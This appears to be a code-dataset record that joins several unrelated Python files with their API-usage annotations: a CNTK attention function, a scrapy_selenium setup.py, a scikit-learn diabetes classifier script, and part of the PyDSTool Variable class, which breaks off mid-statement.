init = get_default_override(AttentionModel, init=init)
go_backwards = get_default_override(AttentionModel, go_backwards=go_backwards)
enable_self_stabilization = get_default_override(AttentionModel, enable_self_stabilization=enable_self_stabilization)
# until CNTK can handle multiple nested dynamic loops, we require fixed windows and fake it
if attention_span is None or attention_axis is None:
raise NotImplementedError('AttentionModel currently requires a fixed attention_span and a static attention_axis to be specified')
if attention_span <= 0:
raise ValueError('attention_span must be a positive value')
# model parameters
with default_options(bias=False): # all the projections have no bias
attn_proj_enc = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(attention_dim, init=init, input_rank=1) # projects input hidden state, keeping span axes intact
attn_proj_dec = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(attention_dim, init=init, input_rank=1) # projects decoder hidden state, but keeping span and beam-search axes intact
attn_proj_tanh = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(1 , init=init, input_rank=1) # projects tanh output, keeping span and beam-search axes intact
attn_final_stab = Stabilizer(enable_self_stabilization=enable_self_stabilization)
# attention function
@Function
def attention(h_enc, h_dec):
history_axis = h_dec # we use history_axis wherever we pass this only for the sake of passing its axis
# TODO: pull this apart so that we can compute the encoder window only once and apply it to multiple decoders
# --- encoder state window
(h_enc, h_enc_valid) = PastValueWindow(attention_span, axis=attention_axis, go_backwards=go_backwards)(h_enc).outputs
h_enc_proj = attn_proj_enc(h_enc)
# window must be broadcast to every decoder time step
h_enc_proj = C.sequence.broadcast_as(h_enc_proj, history_axis)
h_enc_valid = C.sequence.broadcast_as(h_enc_valid, history_axis)
# --- decoder state
# project decoder hidden state
h_dec_proj = attn_proj_dec(h_dec)
tanh_out = C.tanh(h_dec_proj + h_enc_proj) # (attention_span, attention_dim)
u = attn_proj_tanh(tanh_out) # (attention_span, 1)
u_masked = u + (h_enc_valid - 1) * 50 # logzero-out the unused elements for the softmax denominator TODO: use a less arbitrary number than 50
attention_weights = C.softmax(u_masked, axis=attention_axis) #, name='attention_weights')
attention_weights = Label('attention_weights')(attention_weights)
# now take weighted sum over the encoder state vectors
h_att = C.reduce_sum(C.element_times(h_enc_proj, attention_weights), axis=attention_axis)
h_att = attn_final_stab(h_att)
return h_att
return _inject_name(attention, name)
|
[
"cntk.default_options.default_override_or",
"cntk.default_options.get_default_override",
"cntk.softmax",
"cntk.tanh",
"cntk.initializer.glorot_uniform",
"cntk.element_times",
"cntk.default_options.default_options",
"cntk.sequence.broadcast_as"
] |
[((921, 947), 'cntk.default_options.default_override_or', 'default_override_or', (['(False)'], {}), '(False)\n', (940, 947), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((994, 1019), 'cntk.default_options.default_override_or', 'default_override_or', (['(True)'], {}), '(True)\n', (1013, 1019), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1442, 1489), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'init': 'init'}), '(AttentionModel, init=init)\n', (1462, 1489), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1522, 1585), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'go_backwards': 'go_backwards'}), '(AttentionModel, go_backwards=go_backwards)\n', (1542, 1585), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1618, 1712), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'enable_self_stabilization': 'enable_self_stabilization'}), '(AttentionModel, enable_self_stabilization=\n enable_self_stabilization)\n', (1638, 1712), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((870, 886), 'cntk.initializer.glorot_uniform', 'glorot_uniform', ([], {}), '()\n', (884, 886), False, 'from cntk.initializer import glorot_uniform\n'), ((2129, 2156), 'cntk.default_options.default_options', 'default_options', ([], {'bias': '(False)'}), '(bias=False)\n', (2144, 2156), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((3484, 3533), 'cntk.sequence.broadcast_as', 'C.sequence.broadcast_as', (['h_enc_proj', 'history_axis'], {}), '(h_enc_proj, history_axis)\n', (3507, 3533), True, 'import cntk as C\n'), ((3557, 3607), 'cntk.sequence.broadcast_as', 'C.sequence.broadcast_as', (['h_enc_valid', 'history_axis'], {}), '(h_enc_valid, history_axis)\n', (3580, 3607), True, 'import cntk as C\n'), ((3736, 3767), 'cntk.tanh', 'C.tanh', (['(h_dec_proj + h_enc_proj)'], {}), '(h_dec_proj + h_enc_proj)\n', (3742, 3767), True, 'import cntk as C\n'), ((4058, 4098), 'cntk.softmax', 'C.softmax', (['u_masked'], {'axis': 'attention_axis'}), '(u_masked, axis=attention_axis)\n', (4067, 4098), True, 'import cntk as C\n'), ((4294, 4340), 'cntk.element_times', 'C.element_times', (['h_enc_proj', 'attention_weights'], {}), '(h_enc_proj, attention_weights)\n', (4309, 4340), True, 'import cntk as C\n')]
|
from setuptools import setup, find_packages
setup(
name='scrapy_selenium',
version='0.0.9',
description='Selenium Middleware for Scrapy that allow for multiple concurrent headless browsers.',
long_description=open('README.md').read(),
long_description_content_type="text/markdown",
keywords='scrapy selenium middleware webdriver web-scraping',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='https://github.com/dylanwalker/better-scrapy-selenium',
python_requires='>=3.5',
packages=find_packages(),
install_requires=[
"scrapy>=1.0.0",
"selenium>=3.0.0"
],
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Operating System :: OS Independent",
],
extras_require={
"dev": [
"pytest>=3.7",
]
}
)
|
[
"setuptools.find_packages"
] |
[((601, 616), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (614, 616), False, 'from setuptools import setup, find_packages\n')]
|
import pickle
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import confusion_matrix, accuracy_score
def pre_processing(X):
pass
# sc = StandardScaler()
# X = sc.fit_transform(X)
# return X
def training():
df = pd.read_csv("datasets/Diabetes.csv")
y=df[["Outcome"]]
df.drop("Outcome", axis="columns", inplace=True)
X=df
# X = df.iloc[:, :-1].values
# y = df.iloc[:, -1].values
# X=pre_processing(X)
dummyRow_diabetes=pd.DataFrame(np.zeros(len(X.columns)).reshape(1,len(X.columns)), columns=X.columns)
dummyRow_diabetes.to_csv('datasets/dummyRow_diabetes.csv', index=False)
# from sklearn.neighbors import KNeighborsClassifier
# classifier = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)
# classifier.fit(X_train, y_train)
# from sklearn.linear_model import LogisticRegression
# classifier = LogisticRegression(random_state=0)
# classifier.fit(X_train, y_train)
classifier = DecisionTreeClassifier(criterion = 'entropy', random_state = 0)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
classifier.fit(X, y)
pkl_filename="datasets/pickle_model_diabetes.pkl"
with open(pkl_filename,'wb') as file:
pickle.dump(classifier,file)
y_pred = classifier.predict(X_test)
cm = confusion_matrix(y_test, y_pred)
print(cm)
print(accuracy_score(y_test, y_pred))
def pred(ob):
d1=ob.to_dict()
df=pd.DataFrame(d1,index=[0])
# df=pre_processing(df)
# df.drop("Disease", axis="columns", inplace=True)
dummyRow_filename="datasets/dummyRow_diabetes.csv"
df2=pd.read_csv(dummyRow_filename)
for c1 in df.columns:
df2[c1]=df[c1]
print(df2[c1])
pkl_filename='datasets/pickle_model_diabetes.pkl'
with open(pkl_filename,'rb') as file:
classifier=pickle.load(file)
pred=classifier.predict(df2)
return pred
if __name__=="__main__":
training()#df
|
[
"pandas.DataFrame",
"pickle.dump",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.accuracy_score",
"sklearn.tree.DecisionTreeClassifier",
"pickle.load",
"sklearn.metrics.confusion_matrix"
] |
[((390, 426), 'pandas.read_csv', 'pd.read_csv', (['"""datasets/Diabetes.csv"""'], {}), "('datasets/Diabetes.csv')\n", (401, 426), True, 'import pandas as pd\n'), ((1140, 1199), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {'criterion': '"""entropy"""', 'random_state': '(0)'}), "(criterion='entropy', random_state=0)\n", (1162, 1199), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((1243, 1297), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.25)', 'random_state': '(0)'}), '(X, y, test_size=0.25, random_state=0)\n', (1259, 1297), False, 'from sklearn.model_selection import train_test_split\n'), ((1516, 1548), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1532, 1548), False, 'from sklearn.metrics import confusion_matrix, accuracy_score\n'), ((1647, 1674), 'pandas.DataFrame', 'pd.DataFrame', (['d1'], {'index': '[0]'}), '(d1, index=[0])\n', (1659, 1674), True, 'import pandas as pd\n'), ((1820, 1850), 'pandas.read_csv', 'pd.read_csv', (['dummyRow_filename'], {}), '(dummyRow_filename)\n', (1831, 1850), True, 'import pandas as pd\n'), ((1438, 1467), 'pickle.dump', 'pickle.dump', (['classifier', 'file'], {}), '(classifier, file)\n', (1449, 1467), False, 'import pickle\n'), ((1573, 1603), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1587, 1603), False, 'from sklearn.metrics import confusion_matrix, accuracy_score\n'), ((2038, 2055), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (2049, 2055), False, 'import pickle\n')]
|
"""Variable is a one-dimensional discrete and continuous real variable class.
<NAME>, July 2005
"""
# ----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
# PyDSTool imports
from .utils import *
from .common import *
from .common import (
_num_types,
_num_equivtype,
_float_types,
_real_types,
_int_types,
_seq_types,
_num_type2name,
_num_name2type,
_num_name2equivtypes,
_all_float,
_all_int,
_all_complex,
_num_maxmin,
)
from .errors import *
from .Points import *
from .Interval import *
from .FuncSpec import ImpFuncSpec
from numpy import (
Inf,
NaN,
isfinite,
sometrue,
alltrue,
any,
all,
array,
float64,
int32,
ndarray,
asarray,
)
import copy
import types, math, random
import six
__all__ = [
"Variable",
"HybridVariable",
"OutputFn",
"isinputcts",
"isinputdiscrete",
"isoutputcts",
"isoutputdiscrete",
"iscontinuous",
"isdiscrete",
"numeric_to_vars",
"pointset_to_vars",
]
# ------------------------------------------------------------------
class VarDiagnostics(Diagnostics):
def getWarnings(self):
if self.warnings:
output = "Warnings:"
for (i, d) in self.warnings:
if d is None:
output += "Independent variable value %s was out of " % i + "bounds"
else:
output += (
"Dependent variable value was out of "
+ "bounds at independent variable value %s" % i
)
else:
output = ""
return output
def pointset_to_vars(pts, discrete=True):
"""Utility to convert Pointset to a dictionary of Variables.
If discrete option set to False (default is True) then the
Variables will be linearly interpolated within their domain.
Any labels in the pointset will be preserved in the Variables
in case of their re-extraction using the getDataPoints method.
"""
coordnames = pts.coordnames
vals = pts.coordarray
all_types_float = pts.coordtype == float
if isparameterized(pts):
indepvar = pts.indepvararray
indepvarname = pts.indepvarname
if discrete:
indepvartype = int
else:
indepvartype = float
indepdomain = Interval(
pts.indepvarname,
indepvartype,
extent(pts.indepvararray),
abseps=pts._abseps,
)
else:
indepvar = None
indepvarname = None
indepdomain = None
return numeric_to_vars(
vals,
coordnames,
indepvar,
indepvarname,
indepdomain,
all_types_float,
discrete,
pts._abseps,
pts.labels,
)
def numeric_to_vars(
vals,
coordnames,
indepvar=None,
indepvarname="t",
indepdomain=None,
all_types_float=True,
discrete=True,
abseps=None,
labels=None,
):
"""Utility to convert numeric types to a dictionary of Variables.
If discrete option set to True (default is False) then the
Variables will be linearly interpolated within their domain.
"""
if isinstance(coordnames, str):
coordnames = [coordnames]
if isinstance(vals, _num_types):
vals = [[vals]]
vars = {}
if indepvar is None:
for i, c in enumerate(coordnames):
if all_types_float:
vartype = float
else:
vartype = array(vals[i]).dtype.type
if discrete:
vars[c] = Variable(
outputdata=Pointset(
{"coordnames": c, "coordarray": vals[i], "coordtype": vartype}
),
name=c,
abseps=abseps,
labels=labels,
)
else:
raise AssertionError(
"Cannot use continuously defined "
"option without an independent variable"
)
return vars
else:
if isinstance(indepvar, _num_types):
indepvartype = type(indepvar)
indepvar = [indepvar]
else:
indepvartype = asarray(indepvar).dtype.type
if indepdomain is None:
indepdomain = indepvarname
else:
if isinstance(indepdomain, Interval):
assert indepvarname == indepdomain.name, "Indep varname mismatch"
else:
if discrete:
var_type = int
else:
var_type = float
indepdomain = Interval(indepvarname, var_type, indepdomain)
for i, c in enumerate(coordnames):
if all_types_float:
vartype = float
else:
vartype = array(vals[i]).dtype.type
if discrete:
vars[c] = Variable(
outputdata=Pointset(
{
"coordnames": c,
"coordarray": vals[i],
"coordtype": vartype,
"indepvarname": indepvarname,
"indepvararray": indepvar,
"indepvartype": indepvartype,
}
),
indepdomain=indepdomain,
name=c,
abseps=abseps,
labels=labels,
)
else:
dom_int = Interval(c, vartype, extent(vals[i]), abseps=abseps)
vars[c] = Variable(
outputdata=interp1d(indepvar, vals[i]),
indepdomain=indepdomain,
depdomain=dom_int,
name=c,
abseps=abseps,
labels=labels,
)
return vars
class Variable(object):
"""One-dimensional discrete and continuous real variable class.
"""
def __init__(
self,
outputdata=None,
indepdomain=None,
depdomain=None,
name="noname",
abseps=None,
labels=None,
):
# funcreg stores function data for dynamically created methods
# to allow a Variable to be copied using pickling
self._funcreg = {}
if isinstance(name, str):
# !!! name is probably redundant
self.name = name
else:
raise TypeError("name argument must be a string")
# defaults for empty 'placeholder' Variables used by ODEsystem
if outputdata is None or isinstance(outputdata, (Pointset, interp1d)):
if indepdomain is None:
indepdomain = "t"
if depdomain is None:
depdomain = "x"
# set some initial values so that can test if what changed
# after calling setOutput()
self._vectorizable = True
self.defined = False
self.indepdomain = None
self.indepvartype = None
self.indepvarname = None
self.depdomain = None
self.coordtype = None
self.coordname = None
self._refvars = None # for use with ExplicitFnGen
# Ranges covered by the current trajectory held (if known)
self.trajirange = None
self.trajdrange = None
# independent variable domain
self.setIndepdomain(indepdomain, abseps)
# used internally, especially for "input" variables
self._internal_t_offset = 0
# output function
self.setOutput(outputdata, abseps)
# dependent variable domain
self.setDepdomain(depdomain, abseps)
assert self.coordname != self.indepvarname, (
"Independent variable " "name and coordinate name must be different"
)
self.diagnostics = VarDiagnostics()
# labels is for internal use in case Variable data is from a Pointset
# that uses labels. This preserves them for getDataPoints method to
# restore them.
self.labels = labels
def is_continuous_valued(self):
return isoutputcts(self)
def is_discrete_valued(self):
return not isoutputcts(self)
# Auxiliary functions for user-defined code to call
def _auxfn_globalindepvar(self, parsinps, t):
return self.globalt0 + t
def _auxfn_initcond(self, parsinps, varname):
return self.initialconditions[varname]
def _auxfn_heav(self, parsinps, x):
if x > 0:
return 1
else:
return 0
def _auxfn_if(self, parsinps, c, e1, e2):
if c:
return e1
else:
return e2
def _auxfn_getindex(self, parsinps, varname):
return self._var_namemap[varname]
def addMethods(self, funcspec):
"""Add dynamically-created methods to Veriable object"""
# Add the auxiliary function specs to this Variable's namespace
for auxfnname in funcspec.auxfns:
fninfo = funcspec.auxfns[auxfnname]
if not hasattr(Variable, fninfo[1]):
# user-defined auxiliary functions
# (built-ins are provided explicitly)
try:
six.exec_(fninfo[0], globals())
except:
print("Error in supplied auxiliary function code")
raise
self._funcreg[fninfo[1]] = ("Variable", fninfo[0])
setattr(Variable, fninfo[1], eval(fninfo[1]))
# Add the spec function to this Variable's namespace
fninfo_spec = funcspec.spec
if not hasattr(Variable, fninfo_spec[1]):
try:
six.exec_(fninfo_spec[0], globals())
except:
print("Error in supplied functional specification code")
raise
self._funcreg[fninfo_spec[1]] = ("Variable", fninfo_spec[0])
setattr(Variable, fninfo_spec[1], eval(fninfo_spec[1]))
# Add the auxiliary spec function (if present) to this Var's namespace
if funcspec.auxspec:
fninfo_auxspec = funcspec.auxspec
if not hasattr(Variable, fninfo_auxspec[1]):
try:
six.exec_(fninfo_auxspec[0], globals())
except:
print("Error in supplied auxiliary variable code")
raise
self._funcreg[fninfo_auxspec[1]] = ("Variable", fninfo_auxspec[0])
setattr(Variable, fninfo_auxspec[1], eval(fninfo_auxspec[1]))
# For implicit functions
if isinstance(funcspec, ImpFuncSpec):
impfn_name = funcspec.algparams["impfn_name"]
if funcspec.algparams["jac"]:
jac_str = "fprime=funcspec.algparams['jac'],"
else:
jac_str = ""
# Wrap spec fn like this as it has been set up as a
# method, but want to call as regular function
# *** ALSO *** spec fn has signature (ds, t, x, p)
# but implicit function solvers expect
# (x, t, p), so have to switch 1st and 2nd args here
# after 'ds' filled with None
if len(funcspec.vars) == 1:
# dimension == 1, so have to make list output from spec
# into a scalar
# Also, scalar a1 needs to be put into list form for
# acceptance as x in spec fn
specfn_str = (
"lambda a1, a2, a3: " + fninfo_spec[1] + "(None, a2, [a1], a3)[0]"
)
else:
# for dimension > 1 a1 will already be an array / list
specfn_str = (
"lambda a1, a2, a3: " + fninfo_spec[1] + "(None, a2, a1, a3)"
)
this_scope = globals() # WE CHANGE GLOBALS()
this_scope.update(
{
"funcspec": locals()["funcspec"],
"fninfo_spec": locals()["fninfo_spec"],
}
)
impfn_str = (
impfn_name
+ " = makeImplicitFunc("
+ specfn_str
+ ","
+ jac_str
+ """x0=funcspec.algparams['x0'],
extrafargs=(funcspec.algparams['pars'],),
xtolval=funcspec.algparams['atol'],
maxnumiter=funcspec.algparams['maxnumiter'],
solmethod=funcspec.algparams['solvemethod'],
standalone=False)"""
)
try:
six.exec_(impfn_str, this_scope)
except:
print("Error in supplied implicit function code")
raise
# record special reference to the implicit fn,
# as its a method of Variable (for delete method).
self._funcreg["_impfn"] = (impfn_name, impfn_str)
# In previous versions setattr was to self, not the Variable class
setattr(Variable, impfn_name, eval(impfn_name))
# clean up globals() afterwards
del this_scope["funcspec"]
del this_scope["fninfo_spec"]
def getDataPoints(self):
"""Reveal underlying mesh and values at mesh points, provided
Variable is based on a mesh (otherwise None is returned).
The returned Pointset will be time-shifted according to the
Variable's current _internal_t_offset attribute.
Any pointset labels present when the variable was created will
be restored.
"""
if isinstance(self.output, VarCaller):
return Pointset(
indepvarname=self.indepvarname,
indepvararray=self.output.pts.indepvararray + self._internal_t_offset,
coordnames=[self.coordname],
coordarray=self.output.pts.coordarray[0],
labels=self.labels,
)
elif hasattr(self.output, "datapoints"):
datapoints = self.output.datapoints
return Pointset(
indepvarname=self.indepvarname,
indepvararray=datapoints[0] + self._internal_t_offset,
coordnames=[self.coordname],
coordarray=datapoints[1],
labels=self.labels,
)
else:
return None
def underlyingMesh(self):
"""Reveal underlying mesh as arrays, rather than Pointset
as returned by getDataPoints method. If no underlying mesh is
present, None is returned."""
try:
# works if .output is an interpclass instance
mesh = self.output.datapoints
except AttributeError:
try:
# works if .output is a VarCaller instance (with underlying Pointset)
pts = self.output.pts
mesh = array([pts.indepvararray, pts.coordarray[0]])
except AttributeError:
mesh = None
return mesh
def truncate_to_idx(self, idx):
mesh = self.underlyingMesh()
if mesh is None:
raise RuntimeError(
"Cannot truncate a Variable without an underlying mesh by index"
)
try:
new_t_end = mesh[0][idx]
except IndexError:
raise ValueError("Truncation index %d out of range" % idx)
except TypeError:
raise TypeError("Index must be an integer")
if isinstance(self.indepdomain, Interval):
self.indepdomain.set([self.indepdomain[0], new_t_end])
else:
# ndarray type
self.indepdomain = self.indepdomain[0:idx]
# adjust depdomain for array type of dep domain
# (nothing to change for Interval type)
if isinstance(self.depdomain, ndarray):
self.depdomain = self.depdomain[0:idx]
# adjust trajirange and trajdrange
self._setRanges(self.depdomain._abseps)
def _setRanges(self, abseps=None):
# set trajirange and trajdrange for the two types of Variable output method
# that these are associated with (see method setOutput)
try:
output = self.output
except AttributeError:
# output not set or not a compatible type for trajirange and trajdrange
return
if isinstance(output, VarCaller):
self.trajirange = Interval(
"traj_indep_bd",
self.indepvartype,
extent(output.pts.indepvararray),
abseps=abseps,
)
self.trajdrange = Interval(
"traj_dep_bd",
self.coordtype,
extent(output.pts.coordarray[0]),
abseps=abseps,
)
elif isinstance(output, (OutputFn, interpclass) + six.class_types):
if hasattr(output, "types"):
deptype = output.types[0]
indeptype = output.types[1]
else:
# default
deptype = indeptype = float
if isinstance(output.datapoints[0], Interval):
assert compareNumTypes(
output.types[0], output.datapoints[0].type
), "Inconsistent type with Interval bounds"
self.trajirange = output.datapoints[0]
else:
self.trajirange = Interval(
"traj_indep_bd",
indeptype,
extent(output.datapoints[0]),
abseps=abseps,
)
if isinstance(output.datapoints[1], Interval):
assert compareNumTypes(
output.types[1], output.datapoints[1].type
), "Inconsistent type with Interval bounds"
self.trajdrange = output.datapoints[1]
else:
self.trajdrange = Interval(
"traj_dep_bd", deptype, extent(output.datapoints[1]), abseps=abseps
)
def setOutput(
self,
outputdata,
funcspec=None,
globalt0=0,
var_namemap=None,
ics=None,
refvars=None,
abseps=None,
):
"""Dynamically create 'output' method of Variable"""
self.globalt0 = globalt0
if type(outputdata) in [
types.FunctionType,
types.BuiltinFunctionType,
types.MethodType,
]:
# Variable generated from function, given in closed form
self.output = outputdata
assert ics is None, "Invalid option for this type of output"
if outputdata != noneFn:
self.defined = True
elif isinstance(outputdata, tuple):
# For ExplicitFnGen or ImplicitFnGen types, whose functional forms
# may need to access these at call time.
assert len(outputdata) == 2, "Incorrect size of outputdata tuple"
if funcspec is not None:
self.addMethods(funcspec)
self._var_namemap = var_namemap
self._funcreg["funcspec"] = (None, funcspec)
else:
raise ValueError("funcspec missing in setOutput")
# Add the specific mapping functions for Ex/ImplicitFnGen objects
try:
six.exec_(outputdata[1], globals())
except:
print("Internal Error in _mapspecfn code")
raise
has_op = hasattr(self, "output")
# have to define this function in here because use of lambda
# won't allow me to pickle the Variable object
if not has_op or (has_op and self.output is noneFn):
def wrap_output(arg):
return eval(outputdata[0])(self, arg)
setattr(self, "output", wrap_output)
self._funcreg["outputdata"] = (None, outputdata)
t0 = self.indepdomain[0]
if ics is None and not isinstance(funcspec, ImpFuncSpec):
try:
self.initialconditions = {self.coordname: self.output(t0)}
except ValueError:
self.initialconditions = {self.coordname: NaN}
except TypeError:
print("Debugging info: self.output = %s" % self.output)
raise
else:
self.initialconditions = ics
self._vectorizable = False
self._refvars = refvars
self.defined = True
elif isinstance(outputdata, (OutputFn, interpclass) + six.class_types):
# Variable generated by callable object that generates values over
# mesh points that it holds, e.g. by interpolation
# (InstanceType and TypeType are for backwards compatibility, e.g.
# for old SciPy interpolate code that uses Classic Classes)
assert ics is None, "Invalid option for this type of output"
assert "__call__" in dir(outputdata), "Must provide callable object"
self.output = outputdata
if hasattr(outputdata, "datapoints"):
self._setRanges(abseps)
self.defined = True
elif isinstance(outputdata, Pointset):
# Variable generated from a pointset (without interpolation)
assert ics is None, "Invalid option for this type of output"
assert isparameterized(outputdata), (
"Must only pass parameterized" " pointsets"
)
if outputdata.dimension == 1:
self.coordname = copy.copy(outputdata.coordnames[0])
self.indepvarname = outputdata.indepvarname
self.output = VarCaller(outputdata)
self.coordtype = outputdata.coordtype
self.indepvartype = outputdata.indepvartype
if self.indepdomain is not None:
for v in outputdata[self.indepvarname]:
if not v in self.indepdomain:
raise ValueError(
"New Pointset data violates "
"independent variable domain already specified"
)
if self.depdomain is not None:
for v in outputdata[self.coordname]:
if not v in self.depdomain:
raise ValueError(
"New Pointset data violates "
"dependent variable domain already specified"
)
self._setRanges(abseps)
self.defined = True
else:
raise ValueError("Pointset data must be 1D to create a " "Variable")
elif outputdata is None:
# placeholder for an unknown output type
assert ics is None, "Invalid option when outputdata argument is None"
self.output = noneFn
self.defined = False
else:
raise TypeError("Invalid type for data argument: " + str(type(outputdata)))
def setIndepdomain(self, indepdomain, abseps=None):
if isinstance(indepdomain, str):
self.indepvarname = indepdomain
if self.indepdomain is not None:
# If indepdomain already set and indepvarname is none then
# name won't get put in place unless we force it here
self.indepvarname = indepdomain
self.indepdomain.name = indepdomain
else:
self.indepdomain = Interval(
self.indepvarname, float, [-Inf, Inf], abseps=abseps
)
self.indepvartype = float
else:
if isinstance(indepdomain, Interval):
if self.trajirange:
if indepdomain.contains(self.trajirange) is notcontained:
raise ValueError(
"Cannot set independent variable"
" domain inside current trajectory's"
" range"
)
self.indepdomain = indepdomain
self.indepvarname = indepdomain.name
self.indepvartype = _num_name2type[indepdomain.typestr]
elif isinstance(indepdomain, dict):
# enumerated discrete domains
assert len(indepdomain) == 1, (
"Independent variable " "dictionary must have only 1 entry"
)
d = list(indepdomain.values())[0]
assert all(isfinite(d)), "Independent variable values must be" " finite"
if self.trajirange:
assert self.trajirange[0] in d
assert self.trajirange[1] in d
self.indepvarname = list(indepdomain.keys())[0]
if isinstance(d, (list, tuple)):
if self.coordtype is not None:
self.indepdomain = array(d, self.coordtype)
else:
self.indepdomain = array(d)
elif isinstance(d, ndarray):
da = array(d)
if (
self.indepvartype is not None
and self.indepvartype != da.dtype.type
):
raise TypeError(
"Mismatch between type of indepdomain "
"argument and Pointset data"
)
else:
self.indepdomain = da
else:
raise TypeError("Invalid type for independent " "variable domain")
# assert this after self.indepdomain has been made an array
# because isincreasing is most efficient on already-created
# arrays
assert isincreasing(
self.indepdomain
), "Independent variable values must be increasing"
self.indepvartype = self.indepdomain.dtype.type
else:
print("Independent variable argument domain was: %r" % indepdomain)
raise TypeError("Invalid type for independent variable " "domain")
def setDepdomain(self, depdomain, abseps=None):
if isinstance(depdomain, str):
self.coordname = depdomain
if self.depdomain is None:
if self.coordtype is None:
self.depdomain = Interval(
self.coordname, float, [-Inf, Inf], abseps=abseps
)
self.coordtype = float
else:
self.depdomain = Interval(
self.coordname,
self.coordtype,
_num_maxmin[self.coordtype],
abseps=abseps,
)
else:
# If interp functions supplied then don't have a name for
# Interval yet, so update it.
if isinstance(self.output, interpclass) and isinstance(
self.depdomain, Interval
):
self.depdomain.name = depdomain
else:
assert isinstance(self.output, Pointset)
self.diagnostics.warnings.append(
(
self.depdomain.name,
"Dependent variable already named. "
"Ignoring user-supplied name.",
)
)
else:
if isinstance(depdomain, Interval):
if self.trajdrange:
if depdomain.contains(self.trajdrange) is notcontained:
raise ValueError(
"Cannot set dependent variable "
"domain inside current trajectory's "
"range"
)
self.depdomain = depdomain
self.coordname = depdomain.name
if self.coordtype is None:
self.coordtype = depdomain.type
elif self.coordtype == depdomain.type:
pass
else:
raise TypeError(
"Mismatch between type of depdomain "
"argument and Pointset coord data"
)
elif isinstance(depdomain, dict):
assert (
len(depdomain) == 1
), "Depend variables dictionary must have only 1 entry"
d = list(depdomain.values())[0]
if self.trajdrange:
assert self.trajdrange[0] in d
assert self.trajdrange[1] in d
## Assume d is in increasing order
assert all(isfinite(d)), "Values must be finite"
self.coordname = list(depdomain.keys())[0]
if isinstance(d, (list, tuple)):
if self.coordtype is not None:
self.depdomain = array(d, self.coordtype)
else:
self.depdomain = array(d)
elif isinstance(d, ndarray):
da = array(d)
if self.coordtype is not None and self.coordtype != da.dtype.type:
raise TypeError(
"Mismatch between type of depdomain "
"argument and Pointset coord data"
)
else:
self.depdomain = da
else:
raise TypeError("Invalid type for dependent variable " "domain")
self.coordtype = self.depdomain.dtype.type
else:
print("Dependent variable domain argument was: %r" % depdomain)
raise TypeError("Invalid type for dependent variable domain")
if isinstance(self.output, Pointset):
assert (
self.coordname == self.output.coordnames[0]
), "Mismatch between Pointset coord name and declared name"
assert self.indepvarname == self.output.indepvarname, (
"Mismatch between Pointset independent variable name "
"and declared name"
)
def __call__(self, indepvar, checklevel=0):
# Set actual time by subtracting internal offset. Especially for use by
# "input" variables that are based on inherently time-shifted
# arrays of values, with nothing to do with the globalt0 of hybrid
# trajectories.
indepvar = asarray(indepvar) - self._internal_t_offset
if checklevel == 0:
# level 0 -- no depvar bounds checking at all
# (no need to check for indepvar as list case, which output
# should know how to handle)
try:
if not self._vectorizable and isinstance(indepvar, _seq_types):
return [self.output(ival) for ival in indepvar]
else:
return self.output(indepvar)
except (OverflowError, ValueError):
self.diagnostics.errors.append(
(indepvar, self.name + ": Overflow error in output")
)
raise
except PyDSTool_BoundsError:
self.diagnostics.errors.append(
(indepvar, self.name + ": Bounds error in output")
)
raise
elif checklevel in [1, 2]:
if self.trajirange is None:
idep = self.indepdomain
else:
# use known bounds on indep variable imposed by self.output
idep = self.trajirange
indepvar_ok = True
# level 1 -- ignore uncertain cases (treat as contained)
# level 2 -- warn on uncertain (treat as contained)
if isinstance(indepvar, _seq_types):
vectorizable = self._vectorizable
for d in indepvar:
# use 'in' so that this is compatible with
# interval, array and index indeps
try:
contresult = d in idep
except PyDSTool_UncertainValueError:
contresult = True
# adjust for rounding error so that interpolator
# does not barf on out-of-range values
if d < idep[0]:
try:
# list
dix = indepvar.index(d)
except AttributeError:
# array
dix = indepvar.tolist().index(d)
indepvar[dix] = idep[0]
elif d > idep[1]:
try:
# list
dix = indepvar.index(d)
except AttributeError:
# array
dix = indepvar.tolist().index(d)
indepvar[dix] = idep[1]
if checklevel == 2:
self.diagnostics.warnings.append((d, None))
if not contresult:
indepvar_ok = False
break
else:
vectorizable = True
try:
indepvar_ok = indepvar in idep
except PyDSTool_UncertainValueError as errinfo:
# adjust for rounding error so that interpolator
# does not barf on out-of-range values
if indepvar < idep[0]:
indepvar = idep[0]
elif indepvar > idep[1]:
indepvar = idep[1]
if checklevel == 2:
self.diagnostics.warnings.append((indepvar, None))
# continue to get dependent variable value, unless indep
# value was not OK
if not indepvar_ok:
## print "*** Debug info for variable: ", self.name
## print "Interval rounding tolerance was", idep._abseps
if checklevel == 2:
self.diagnostics.errors.append(
(indepvar, self.name + " : " + self.indepdomain._infostr(1))
)
if vectorizable:
raise ValueError(
